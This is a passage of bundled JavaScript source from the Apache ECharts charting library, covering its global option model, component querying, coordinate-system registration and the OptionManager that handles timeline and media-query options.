=== 'recreate' || type === 'media') {\n            var mediaOptions = optionManager.getMediaOption(this, this._api);\n            if (mediaOptions.length) {\n                each$1(mediaOptions, function (mediaOption) {\n                    this.mergeOption(mediaOption, optionChanged = true);\n                }, this);\n            }\n        }\n\n        return optionChanged;\n    },\n\n    /**\n     * @protected\n     */\n    mergeOption: function (newOption) {\n        var option = this.option;\n        var componentsMap = this._componentsMap;\n        var newCptTypes = [];\n\n        resetSourceDefaulter(this);\n\n        // If no component class, merge directly.\n        // For example: color, animaiton options, etc.\n        each$1(newOption, function (componentOption, mainType) {\n            if (componentOption == null) {\n                return;\n            }\n\n            if (!ComponentModel.hasClass(mainType)) {\n                // globalSettingTask.dirty();\n                option[mainType] = option[mainType] == null\n                    ? clone(componentOption)\n                    : merge(option[mainType], componentOption, true);\n            }\n            else if (mainType) {\n                newCptTypes.push(mainType);\n            }\n        });\n\n        ComponentModel.topologicalTravel(\n            newCptTypes, ComponentModel.getAllClassMainTypes(), visitComponent, this\n        );\n\n        function visitComponent(mainType, dependencies) {\n\n            var newCptOptionList = normalizeToArray(newOption[mainType]);\n\n            var mapResult = mappingToExists(\n                componentsMap.get(mainType), newCptOptionList\n            );\n\n            makeIdAndName(mapResult);\n\n            // Set mainType and complete subType.\n            each$1(mapResult, function (item, index) {\n                var opt = item.option;\n                if (isObject$1(opt)) {\n                    item.keyInfo.mainType = mainType;\n                    item.keyInfo.subType = determineSubType(mainType, opt, item.exist);\n                }\n            });\n\n            var dependentModels = getComponentsByTypes(\n                componentsMap, dependencies\n            );\n\n            option[mainType] = [];\n            componentsMap.set(mainType, []);\n\n            each$1(mapResult, function (resultItem, index) {\n                var componentModel = resultItem.exist;\n                var newCptOption = resultItem.option;\n\n                assert$1(\n                    isObject$1(newCptOption) || componentModel,\n                    'Empty component definition'\n                );\n\n                // Consider where is no new option and should be merged using {},\n                // see removeEdgeAndAdd in topologicalTravel and\n                // ComponentModel.getAllClassMainTypes.\n                if (!newCptOption) {\n                    componentModel.mergeOption({}, this);\n                    componentModel.optionUpdated({}, false);\n                }\n                else {\n                    var ComponentModelClass = ComponentModel.getClass(\n                        mainType, resultItem.keyInfo.subType, true\n                    );\n\n                    if (componentModel && componentModel.constructor === ComponentModelClass) {\n                        componentModel.name = resultItem.keyInfo.name;\n                        // componentModel.settingTask && componentModel.settingTask.dirty();\n                        componentModel.mergeOption(newCptOption, this);\n                        componentModel.optionUpdated(newCptOption, false);\n                    }\n                    else {\n                        // PENDING Global as parent ?\n                        var extraOpt = extend(\n                            {\n                                dependentModels: dependentModels,\n                                componentIndex: index\n                            },\n                            resultItem.keyInfo\n                        );\n                        componentModel = new ComponentModelClass(\n                            newCptOption, this, this, extraOpt\n                        );\n                        extend(componentModel, extraOpt);\n                        componentModel.init(newCptOption, this, this, extraOpt);\n\n                        // Call optionUpdated after init.\n                        // newCptOption has been used as componentModel.option\n                        // and may be merged with theme and default, so pass null\n                        // to avoid confusion.\n                        componentModel.optionUpdated(null, true);\n                    }\n                }\n\n                componentsMap.get(mainType)[index] = componentModel;\n                option[mainType][index] = componentModel.option;\n            }, this);\n\n            // Backup series for filtering.\n            if (mainType === 'series') {\n                createSeriesIndices(this, componentsMap.get('series'));\n            }\n        }\n\n        this._seriesIndicesMap = createHashMap(\n            this._seriesIndices = this._seriesIndices || []\n        );\n    },\n\n    /**\n     * Get option for output (cloned option and inner info removed)\n     * @public\n     * @return {Object}\n     */\n    getOption: function () {\n        var option = clone(this.option);\n\n        each$1(option, function (opts, mainType) {\n            if (ComponentModel.hasClass(mainType)) {\n                var opts = normalizeToArray(opts);\n                for (var i = opts.length - 1; i >= 0; i--) {\n                    // Remove options with inner id.\n                    if (isIdInner(opts[i])) {\n                        opts.splice(i, 1);\n                    }\n                }\n                option[mainType] = opts;\n            }\n        });\n\n        delete option[OPTION_INNER_KEY];\n\n        return option;\n    },\n\n    /**\n     * @return {module:echarts/model/Model}\n     */\n    getTheme: function () {\n        return this._theme;\n    },\n\n    /**\n     * @param {string} mainType\n     * @param {number} [idx=0]\n     * @return {module:echarts/model/Component}\n     */\n    getComponent: function (mainType, idx) {\n        var list = this._componentsMap.get(mainType);\n        if (list) {\n            return list[idx || 0];\n        }\n    },\n\n    /**\n     * If none of index and id and name used, return all components with mainType.\n     * @param {Object} condition\n     * @param {string} condition.mainType\n     * @param {string} [condition.subType] If ignore, only query by mainType\n     * @param {number|Array.<number>} [condition.index] Either input index or id or name.\n     * @param {string|Array.<string>} [condition.id] Either input index or id or name.\n     * @param {string|Array.<string>} [condition.name] Either input index or id or name.\n     * @return {Array.<module:echarts/model/Component>}\n     */\n    queryComponents: function (condition) {\n        var mainType = condition.mainType;\n        if (!mainType) {\n            return [];\n        }\n\n        var index = condition.index;\n        var id = condition.id;\n        var name = condition.name;\n\n        var cpts = this._componentsMap.get(mainType);\n\n        if (!cpts || !cpts.length) {\n            return [];\n        }\n\n        var result;\n\n        if (index != null) {\n            if (!isArray(index)) {\n                index = [index];\n            }\n            result = filter(map(index, function (idx) {\n                return cpts[idx];\n            }), function (val) {\n                return !!val;\n            });\n        }\n        else if (id != null) {\n            var isIdArray = isArray(id);\n            result = filter(cpts, function (cpt) {\n                return (isIdArray && indexOf(id, cpt.id) >= 0)\n                    || (!isIdArray && cpt.id === id);\n            });\n        }\n        else if (name != null) {\n            var isNameArray = isArray(name);\n            result = filter(cpts, function (cpt) {\n                return (isNameArray && indexOf(name, cpt.name) >= 0)\n                    || (!isNameArray && cpt.name === name);\n            });\n        }\n        else {\n            // Return all components with mainType\n            result = cpts.slice();\n        }\n\n        return filterBySubType(result, condition);\n    },\n\n    /**\n     * The interface is different from queryComponents,\n     * which is convenient for inner usage.\n     *\n     * @usage\n     * var result = findComponents(\n     *     {mainType: 'dataZoom', query: {dataZoomId: 'abc'}}\n     * );\n     * var result = findComponents(\n     *     {mainType: 'series', subType: 'pie', query: {seriesName: 'uio'}}\n     * );\n     * var result = findComponents(\n     *     {mainType: 'series',\n     *     filter: function (model, index) {...}}\n     * );\n     * // result like [component0, componnet1, ...]\n     *\n     * @param {Object} condition\n     * @param {string} condition.mainType Mandatory.\n     * @param {string} [condition.subType] Optional.\n     * @param {Object} [condition.query] like {xxxIndex, xxxId, xxxName},\n     *        where xxx is mainType.\n     *        If query attribute is null/undefined or has no index/id/name,\n     *        do not filtering by query conditions, which is convenient for\n     *        no-payload situations or when target of action is global.\n     * @param {Function} [condition.filter] parameter: component, return boolean.\n     * @return {Array.<module:echarts/model/Component>}\n     */\n    findComponents: function (condition) {\n        var query = condition.query;\n        var mainType = condition.mainType;\n\n        var queryCond = getQueryCond(query);\n        var result = queryCond\n            ? this.queryComponents(queryCond)\n            : this._componentsMap.get(mainType);\n\n        return doFilter(filterBySubType(result, condition));\n\n        function getQueryCond(q) {\n            var indexAttr = mainType + 'Index';\n            var idAttr = mainType + 'Id';\n            var nameAttr = mainType + 'Name';\n            return q && (\n                    q[indexAttr] != null\n                    || q[idAttr] != null\n                    || q[nameAttr] != null\n                )\n                ? {\n                    mainType: mainType,\n                    // subType will be filtered finally.\n                    index: q[indexAttr],\n                    id: q[idAttr],\n                    name: q[nameAttr]\n                }\n                : null;\n        }\n\n        function doFilter(res) {\n            return condition.filter\n                    ? filter(res, condition.filter)\n                    : res;\n        }\n    },\n\n    /**\n     * @usage\n     * eachComponent('legend', function (legendModel, index) {\n     *     ...\n     * });\n     * eachComponent(function (componentType, model, index) {\n     *     // componentType does not include subType\n     *     // (componentType is 'xxx' but not 'xxx.aa')\n     * });\n     * eachComponent(\n     *     {mainType: 'dataZoom', query: {dataZoomId: 'abc'}},\n     *     function (model, index) {...}\n     * );\n     * eachComponent(\n     *     {mainType: 'series', subType: 'pie', query: {seriesName: 'uio'}},\n     *     function (model, index) {...}\n     * );\n     *\n     * @param {string|Object=} mainType When mainType is object, the definition\n     *                                  is the same as the method 'findComponents'.\n     * @param {Function} cb\n     * @param {*} context\n     */\n    eachComponent: function (mainType, cb, context) {\n        var componentsMap = this._componentsMap;\n\n        if (typeof mainType === 'function') {\n            context = cb;\n            cb = mainType;\n            componentsMap.each(function (components, componentType) {\n                each$1(components, function (component, index) {\n                    cb.call(context, componentType, component, index);\n                });\n            });\n        }\n        else if (isString(mainType)) {\n            each$1(componentsMap.get(mainType), cb, context);\n        }\n        else if (isObject$1(mainType)) {\n            var queryResult = this.findComponents(mainType);\n            each$1(queryResult, cb, context);\n        }\n    },\n\n    /**\n     * @param {string} name\n     * @return {Array.<module:echarts/model/Series>}\n     */\n    getSeriesByName: function (name) {\n        var series = this._componentsMap.get('series');\n        return filter(series, function (oneSeries) {\n            return oneSeries.name === name;\n        });\n    },\n\n    /**\n     * @param {number} seriesIndex\n     * @return {module:echarts/model/Series}\n     */\n    getSeriesByIndex: function (seriesIndex) {\n        return this._componentsMap.get('series')[seriesIndex];\n    },\n\n    /**\n     * Get series list before filtered by type.\n     * FIXME: rename to getRawSeriesByType?\n     *\n     * @param {string} subType\n     * @return {Array.<module:echarts/model/Series>}\n     */\n    getSeriesByType: function (subType) {\n        var series = this._componentsMap.get('series');\n        return filter(series, function (oneSeries) {\n            return oneSeries.subType === subType;\n        });\n    },\n\n    /**\n     * @return {Array.<module:echarts/model/Series>}\n     */\n    getSeries: function () {\n        return this._componentsMap.get('series').slice();\n    },\n\n    /**\n     * @return {number}\n     */\n    getSeriesCount: function () {\n        return this._componentsMap.get('series').length;\n    },\n\n    /**\n     * After filtering, series may be different\n     * frome raw series.\n     *\n     * @param {Function} cb\n     * @param {*} context\n     */\n    eachSeries: function (cb, context) {\n        assertSeriesInitialized(this);\n        each$1(this._seriesIndices, function (rawSeriesIndex) {\n            var series = this._componentsMap.get('series')[rawSeriesIndex];\n            cb.call(context, series, rawSeriesIndex);\n        }, this);\n    },\n\n    /**\n     * Iterate raw series before filtered.\n     *\n     * @param {Function} cb\n     * @param {*} context\n     */\n    eachRawSeries: function (cb, context) {\n        each$1(this._componentsMap.get('series'), cb, context);\n    },\n\n    /**\n     * After filtering, series may be different.\n     * frome raw series.\n     *\n     * @param {string} subType.\n     * @param {Function} cb\n     * @param {*} context\n     */\n    eachSeriesByType: function (subType, cb, context) {\n        assertSeriesInitialized(this);\n        each$1(this._seriesIndices, function (rawSeriesIndex) {\n            var series = this._componentsMap.get('series')[rawSeriesIndex];\n            if (series.subType === subType) {\n                cb.call(context, series, rawSeriesIndex);\n            }\n        }, this);\n    },\n\n    /**\n     * Iterate raw series before filtered of given type.\n     *\n     * @parma {string} subType\n     * @param {Function} cb\n     * @param {*} context\n     */\n    eachRawSeriesByType: function (subType, cb, context) {\n        return each$1(this.getSeriesByType(subType), cb, context);\n    },\n\n    /**\n     * @param {module:echarts/model/Series} seriesModel\n     */\n    isSeriesFiltered: function (seriesModel) {\n        assertSeriesInitialized(this);\n        return this._seriesIndicesMap.get(seriesModel.componentIndex) == null;\n    },\n\n    /**\n     * @return {Array.<number>}\n     */\n    getCurrentSeriesIndices: function () {\n        return (this._seriesIndices || []).slice();\n    },\n\n    /**\n     * @param {Function} cb\n     * @param {*} context\n     */\n    filterSeries: function (cb, context) {\n        assertSeriesInitialized(this);\n        var filteredSeries = filter(\n            this._componentsMap.get('series'), cb, context\n        );\n        createSeriesIndices(this, filteredSeries);\n    },\n\n    restoreData: function (payload) {\n        var componentsMap = this._componentsMap;\n\n        createSeriesIndices(this, componentsMap.get('series'));\n\n        var componentTypes = [];\n        componentsMap.each(function (components, componentType) {\n            componentTypes.push(componentType);\n        });\n\n        ComponentModel.topologicalTravel(\n            componentTypes,\n            ComponentModel.getAllClassMainTypes(),\n            function (componentType, dependencies) {\n                each$1(componentsMap.get(componentType), function (component) {\n                    (componentType !== 'series' || !isNotTargetSeries(component, payload))\n                        && component.restoreData();\n                });\n            }\n        );\n    }\n\n});\n\nfunction isNotTargetSeries(seriesModel, payload) {\n    if (payload) {\n        var index = payload.seiresIndex;\n        var id = payload.seriesId;\n        var name = payload.seriesName;\n        return (index != null && seriesModel.componentIndex !== index)\n            || (id != null && seriesModel.id !== id)\n            || (name != null && seriesModel.name !== name);\n    }\n}\n\n/**\n * @inner\n */\nfunction mergeTheme(option, theme) {\n    // PENDING\n    // NOT use `colorLayer` in theme if option has `color`\n    var notMergeColorLayer = option.color && !option.colorLayer;\n\n    each$1(theme, function (themeItem, name) {\n        if (name === 'colorLayer' && notMergeColorLayer) {\n            return;\n        }\n        // 如果有 component model 则把具体的 merge 逻辑交给该 model 处理\n        if (!ComponentModel.hasClass(name)) {\n            if (typeof themeItem === 'object') {\n                option[name] = !option[name]\n                    ? clone(themeItem)\n                    : merge(option[name], themeItem, false);\n            }\n            else {\n                if (option[name] == null) {\n                    option[name] = themeItem;\n                }\n            }\n        }\n    });\n}\n\nfunction initBase(baseOption) {\n    baseOption = baseOption;\n\n    // Using OPTION_INNER_KEY to mark that this option can not be used outside,\n    // i.e. `chart.setOption(chart.getModel().option);` is forbiden.\n    this.option = {};\n    this.option[OPTION_INNER_KEY] = 1;\n\n    /**\n     * Init with series: [], in case of calling findSeries method\n     * before series initialized.\n     * @type {Object.<string, Array.<module:echarts/model/Model>>}\n     * @private\n     */\n    this._componentsMap = createHashMap({series: []});\n\n    /**\n     * Mapping between filtered series list and raw series list.\n     * key: filtered series indices, value: raw series indices.\n     * @type {Array.<nubmer>}\n     * @private\n     */\n    this._seriesIndices;\n\n    this._seriesIndicesMap;\n\n    mergeTheme(baseOption, this._theme.option);\n\n    // TODO Needs clone when merging to the unexisted property\n    merge(baseOption, globalDefault, false);\n\n    this.mergeOption(baseOption);\n}\n\n/**\n * @inner\n * @param {Array.<string>|string} types model types\n * @return {Object} key: {string} type, value: {Array.<Object>} models\n */\nfunction getComponentsByTypes(componentsMap, types) {\n    if (!isArray(types)) {\n        types = types ? [types] : [];\n    }\n\n    var ret = {};\n    each$1(types, function (type) {\n        ret[type] = (componentsMap.get(type) || []).slice();\n    });\n\n    return ret;\n}\n\n/**\n * @inner\n */\nfunction determineSubType(mainType, newCptOption, existComponent) {\n    var subType = newCptOption.type\n        ? newCptOption.type\n        : existComponent\n        ? existComponent.subType\n        // Use determineSubType only when there is no existComponent.\n        : ComponentModel.determineSubType(mainType, newCptOption);\n\n    // tooltip, markline, markpoint may always has no subType\n    return subType;\n}\n\n/**\n * @inner\n */\nfunction createSeriesIndices(ecModel, seriesModels) {\n    ecModel._seriesIndicesMap = createHashMap(\n        ecModel._seriesIndices = map(seriesModels, function (series) {\n            return series.componentIndex;\n        }) || []\n    );\n}\n\n/**\n * @inner\n */\nfunction filterBySubType(components, condition) {\n    // Using hasOwnProperty for restrict. Consider\n    // subType is undefined in user payload.\n    return condition.hasOwnProperty('subType')\n        ? filter(components, function (cpt) {\n            return cpt.subType === condition.subType;\n        })\n        : components;\n}\n\n/**\n * @inner\n */\nfunction assertSeriesInitialized(ecModel) {\n    // Components that use _seriesIndices should depends on series component,\n    // which make sure that their initialization is after series.\n    if (__DEV__) {\n        if (!ecModel._seriesIndices) {\n            throw new Error('Option should contains series.');\n        }\n    }\n}\n\nmixin(GlobalModel, colorPaletteMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar echartsAPIList = [\n    'getDom', 'getZr', 'getWidth', 'getHeight', 'getDevicePixelRatio', 'dispatchAction', 'isDisposed',\n    'on', 'off', 'getDataURL', 'getConnectedDataURL', 'getModel', 'getOption',\n    'getViewOfComponentModel', 'getViewOfSeriesModel'\n];\n// And `getCoordinateSystems` and `getComponentByElement` will be injected in echarts.js\n\nfunction ExtensionAPI(chartInstance) {\n    each$1(echartsAPIList, function (name) {\n        this[name] = bind(chartInstance[name], chartInstance);\n    }, this);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar coordinateSystemCreators = {};\n\nfunction CoordinateSystemManager() {\n\n    this._coordinateSystems = [];\n}\n\nCoordinateSystemManager.prototype = {\n\n    constructor: CoordinateSystemManager,\n\n    create: function (ecModel, api) {\n        var coordinateSystems = [];\n        each$1(coordinateSystemCreators, function (creater, type) {\n            var list = creater.create(ecModel, api);\n            coordinateSystems = coordinateSystems.concat(list || []);\n        });\n\n        this._coordinateSystems = coordinateSystems;\n    },\n\n    update: function (ecModel, api) {\n        each$1(this._coordinateSystems, function (coordSys) {\n            coordSys.update && coordSys.update(ecModel, api);\n        });\n    },\n\n    getCoordinateSystems: function () {\n        return this._coordinateSystems.slice();\n    }\n};\n\nCoordinateSystemManager.register = function (type, coordinateSystemCreator) {\n    coordinateSystemCreators[type] = coordinateSystemCreator;\n};\n\nCoordinateSystemManager.get = function (type) {\n    return coordinateSystemCreators[type];\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * ECharts option manager\n *\n * @module {echarts/model/OptionManager}\n */\n\n\nvar each$4 = each$1;\nvar clone$3 = clone;\nvar map$1 = map;\nvar merge$1 = merge;\n\nvar QUERY_REG = /^(min|max)?(.+)$/;\n\n/**\n * TERM EXPLANATIONS:\n *\n * [option]:\n *\n *     An object that contains definitions of components. For example:\n *     var option = {\n *         title: {...},\n *         legend: {...},\n *         visualMap: {...},\n *         series: [\n *             {data: [...]},\n *             {data: [...]},\n *             ...\n *         ]\n *     };\n *\n * [rawOption]:\n *\n *     An object input to echarts.setOption. 'rawOption' may be an\n *     'option', or may be an object contains multi-options. For example:\n *     var option = {\n *         baseOption: {\n *             title: {...},\n *             legend: {...},\n *             series: [\n *                 {data: [...]},\n *                 {data: [...]},\n *                 ...\n *             ]\n *         },\n *         timeline: {...},\n *         options: [\n *             {title: {...}, series: {data: [...]}},\n *             {title: {...}, series: {data: [...]}},\n *             ...\n *         ],\n *         media: [\n *             {\n *                 query: {maxWidth: 320},\n *                 option: {series: {x: 20}, visualMap: {show: false}}\n *             },\n *             {\n *                 query: {minWidth: 320, maxWidth: 720},\n *                 option: {series: {x: 500}, visualMap: {show: true}}\n *             },\n *             {\n *                 option: {series: {x: 1200}, visualMap: {show: true}}\n *             }\n *         ]\n *     };\n *\n * @alias module:echarts/model/OptionManager\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction OptionManager(api) {\n\n    /**\n     * @private\n     * @type {module:echarts/ExtensionAPI}\n     */\n    this._api = api;\n\n    /**\n     * @private\n     * @type {Array.<number>}\n     */\n    this._timelineOptions = [];\n\n    /**\n     * @private\n     * @type {Array.<Object>}\n     */\n    this._mediaList = [];\n\n    /**\n     * @private\n     * @type {Object}\n     */\n    this._mediaDefault;\n\n    /**\n     * -1, means default.\n     * empty means no media.\n     * @private\n     * @type {Array.<number>}\n     */\n    this._currentMediaIndices = [];\n\n    /**\n     * @private\n     * @type {Object}\n     */\n    this._optionBackup;\n\n    /**\n     * @private\n     * @type {Object}\n     */\n    this._newBaseOption;\n}\n\n// timeline.notMerge is not supported in ec3. Firstly there is rearly\n// case that notMerge is needed. Secondly supporting 'notMerge' requires\n// rawOption cloned and backuped when timeline changed, which does no\n// good to performance. What's more, that both timeline and setOption\n// method supply 'notMerge' brings complex and some problems.\n// Consider this case:\n// (step1) chart.setOption({timeline: {notMerge: false}, ...}, false);\n// (step2) chart.setOption({timeline: {notMerge: true}, ...}, false);\n\nOptionManager.prototype = {\n\n    constructor: OptionManager,\n\n    /**\n     * @public\n     * @param {Object} rawOption Raw option.\n     * @param {module:echarts/model/Global} ecModel\n     * @param {Array.<Function>} optionPreprocessorFuncs\n     * @return {Object} Init option\n     */\n    setOption: function (rawOption, optionPreprocessorFuncs) {\n        if (rawOption) {\n            // That set dat primitive is dangerous if user reuse the data when setOption again.\n            each$1(normalizeToArray(rawOption.series), function (series) {\n                series && series.data && isTypedArray(series.data) && setAsPrimitive(series.data);\n            });\n        }\n\n        // Caution: some series modify option data, if do not clone,\n        // it should ensure that the repeat modify correctly\n        // (create a new object when modify itself).\n        rawOption = clone$3(rawOption);\n\n        // FIXME\n        // 如果 timeline options 或者 media 中设置了某个属性，而baseOption中没有设置，则进行警告。\n\n        var oldOptionBackup = this._optionBackup;\n        var newParsedOption = parseRawOption.call(\n            this, rawOption, optionPreprocessorFuncs, !oldOptionBackup\n        );\n        this._newBaseOption = newParsedOption.baseOption;\n\n        // For setOption at second time (using merge mode);\n        if (oldOptionBackup) {\n            // Only baseOption can be merged.\n            mergeOption(oldOptionBackup.baseOption, newParsedOption.baseOption);\n\n            // For simplicity, timeline options and media options do not support merge,\n            // that is, if you `setOption` twice and both has timeline options, the latter\n            // timeline opitons will not be merged to the formers, but just substitude them.\n            if (newParsedOption.timelineOptions.length) {\n                oldOptionBackup.timelineOptions = newParsedOption.timelineOptions;\n            }\n            if (newParsedOption.mediaList.length) {\n                oldOptionBackup.mediaList = newParsedOption.mediaList;\n            }\n            if (newParsedOption.mediaDefault) {\n                oldOptionBackup.mediaDefault = newParsedOption.mediaDefault;\n            }\n        }\n        else {\n            this._optionBackup = newParsedOption;\n        }\n    },\n\n    /**\n     * @param {boolean} isRecreate\n     * @return {Object}\n     */\n    mountOption: function (isRecreate) {\n        var optionBackup = this._optionBackup;\n\n        // TODO\n        // 如果没有reset功能则不clone。\n\n        this._timelineOptions = map$1(optionBackup.timelineOptions, clone$3);\n        this._mediaList = map$1(optionBackup.mediaList, clone$3);\n        this._mediaDefault = clone$3(optionBackup.mediaDefault);\n        this._currentMediaIndices = [];\n\n        return clone$3(isRecreate\n            // this._optionBackup.baseOption, which is created at the first `setOption`\n            // called, and is merged into every new option by inner method `mergeOption`\n            // each time `setOption` called, can be only used in `isRecreate`, because\n            // its reliability is under suspicion. In other cases option merge is\n            // performed by `model.mergeOption`.\n            ? optionBackup.baseOption : this._newBaseOption\n        );\n    },\n\n    /**\n     * @param {module:echarts/model/Global} ecModel\n     * @return {Object}\n     */\n    getTimelineOption: function (ecModel) {\n        var option;\n        var timelineOptions = this._timelineOptions;\n\n        if (timelineOptions.length) {\n            // getTimelineOption can only be called after ecModel inited,\n            // so we can get currentIndex from timelineModel.\n            var timelineModel = ecModel.getComponent('timeline');\n            if (timelineModel) {\n                option = clone$3(\n                    timelineOptions[timelineModel.getCurrentIndex()],\n                    true\n                );\n            }\n        }\n\n        return option;\n    },\n\n    /**\n     * @param {module:echarts/model/Global} ecModel\n     * @return {Array.<Object>}\n     */\n    getMediaOption: function (ecModel) {\n        var ecWidth = this._api.getWidth();\n        var ecHeight = this._api.getHeight();\n        var mediaList = this._mediaList;\n        var mediaDefault = this._mediaDefault;\n        var indices = [];\n        var result = [];\n\n        // No media defined.\n        if (!mediaList.length && !mediaDefault) {\n            return result;\n        }\n\n        // Multi media may be applied, the latter defined media has higher priority.\n        for (var i = 0, len = mediaList.length; i < len; i++) {\n            if (applyMediaQuery(mediaList[i].query, ecWidth, ecHeight)) {\n                indices.push(i);\n            }\n        }\n\n        // FIXME\n        // 是否mediaDefault应该强制用户设置，否则可能修改不能回归。\n        if (!indices.length && mediaDefault) {\n            indices = [-1];\n        }\n\n        if (indices.length && !indicesEquals(indices, this._currentMediaIndices)) {\n            result = map$1(indices, function (index) {\n                return clone$3(\n                    index === -1 ? mediaDefault.option : mediaList[index].option\n                );\n            });\n        }\n        // Otherwise return nothing.\n\n        this._currentMediaIndices = indices;\n\n        return result;\n    }\n};\n\nfunction parseRawOption(rawOption, optionPreprocessorFuncs, isNew) {\n    var timelineOptions = [];\n    var mediaList = [];\n    var mediaDefault;\n    var baseOption;\n\n    // Compatible with ec2.\n    var timelineOpt = rawOption.timeline;\n\n    if (rawOption.baseOption) {\n        baseOption = rawOption.baseOption;\n    }\n\n    // For timeline\n    if (timelineOpt || rawOption.options) {\n        baseOption = baseOption || {};\n        timelineOptions = (rawOption.options || []).slice();\n    }\n\n    // For media query\n    if (rawOption.media) {\n        baseOption = baseOption || {};\n        var media = rawOption.media;\n        each$4(media, function (singleMedia) {\n            if (singleMedia && singleMedia.option) {\n                if (singleMedia.query) {\n                    mediaList.push(singleMedia);\n                }\n                else if (!mediaDefault) {\n                    // Use the first media default.\n                    mediaDefault = singleMedia;\n                }\n            }\n        });\n    }\n\n    // For normal option\n    if (!baseOption) {\n        baseOption = rawOption;\n    }\n\n    // Set timelineOpt to baseOption in ec3,\n    // which is convenient for merge option.\n    if (!baseOption.timeline) {\n        baseOption.timeline = timelineOpt;\n    }\n\n    // Preprocess.\n    each$4([baseOption].concat(timelineOptions)\n        .concat(map(mediaList, function (media) {\n            return media.option;\n        })),\n        function (option) {\n            each$4(optionPreprocessorFuncs, function (preProcess) {\n                preProcess(option, isNew);\n            });\n        }\n    );\n\n    return {\n        baseOption: baseOption,\n        timelineOptions: timelineOptions,\n        mediaDefault: mediaDefault,\n        mediaList: mediaList\n    };\n}\n\n/**\n * @see <http://www.w3.org/TR/css3-mediaqueries/#media1>\n * Support: width, height, aspectRatio\n * Can use max or min as prefix.\n */\nfunction applyMediaQuery(query, ecWidth, ecHeight) {\n    var realMap = {\n        width: ecWidth,\n        height: ecHeight,\n        aspectratio: ecWidth / ecHeight // lowser case for convenientce.\n    };\n\n    var applicatable = true;\n\n    each$1(query, function (value, attr) {\n        var matched = attr.match(QUERY_REG);\n\n        if (!matched || !matched[1] || !matched[2]) {\n            return;\n        }\n\n        var operator = matched[1];\n        var realAttr = matched[2].toLowerCase();\n\n        if (!compare(realMap[realAttr], value, operator)) {\n            applicatable = false;\n        }\n    });\n\n    return applicatable;\n}\n\nfunction compare(real, expect, operator) {\n    if (operator === 'min') {\n        return real >= expect;\n    }\n    else if (operator === 'max') {\n        return real <= expect;\n    }\n    else { // Equals\n        return real === expect;\n    }\n}\n\nfunction indicesEquals(indices1, indices2) {\n    // indices is always order by asc and has only finite number.\n    return indices1.join(',') === indices2.join(',');\n}\n\n/**\n * Consider case:\n * `chart.setOption(opt1);`\n * Then user do some interaction like dataZoom, dataView changing.\n * `chart.setOption(opt2);`\n * Then user press 'reset button' in toolbox.\n *\n * After doing that all of the interaction effects should be reset, the\n * chart should be the same as the result of invoke\n * `chart.setOption(opt1); chart.setOption(opt2);`.\n *\n * Although it is not able ensure that\n * `chart.setOption(opt1); chart.setOption(opt2);` is equivalents to\n * `chart.setOption(merge(opt1, opt2));` exactly,\n * this might be the only simple way to implement that feature.\n *\n * MEMO: We've considered some other approaches:\n * 1. Each model handle its self restoration but not uniform treatment.\n *     (Too complex in logic and error-prone)\n * 2. Use a shadow ecModel. (Performace expensive)\n */\nfunction mergeOption(oldOption, newOption) {\n    newOption = newOption || {};\n\n    each$4(newOption, function (newCptOpt, mainType) {\n        if (newCptOpt == null) {\n            return;\n        }\n\n        var oldCptOpt = oldOption[mainType];\n\n        if (!ComponentModel.hasClass(mainType)) {\n            oldOption[mainType] = merge$1(oldCptOpt, newCptOpt, true);\n        }\n        else {\n            newCptOpt = normalizeToArray(newCptOpt);\n            oldCptOpt = normalizeToArray(oldCptOpt);\n\n            var mapResult = mappingToExists(oldCptOpt, newCptOpt);\n\n            oldOption[mainType] = map$1(mapResult, function (item) {\n                return (item.option && item.exist)\n                    ? merge$1(item.exist, item.option, true)\n                    : (item.exist || item.option);\n            });\n        }\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$5 = each$1;\nvar isObject$3 = isObject$1;\n\nvar POSSIBLE_STYLES = [\n    'areaStyle', 'lineStyle', 'nodeStyle', 'linkStyle',\n    'chordStyle', 'label', 'labelLine'\n];\n\nfunction compatEC2ItemStyle(opt) {\n    var itemStyleOpt = opt && opt.itemStyle;\n    if (!itemStyleOpt) {\n        return;\n    }\n    for (var i = 0, len = POSSIBLE_STYLES.length; i < len; 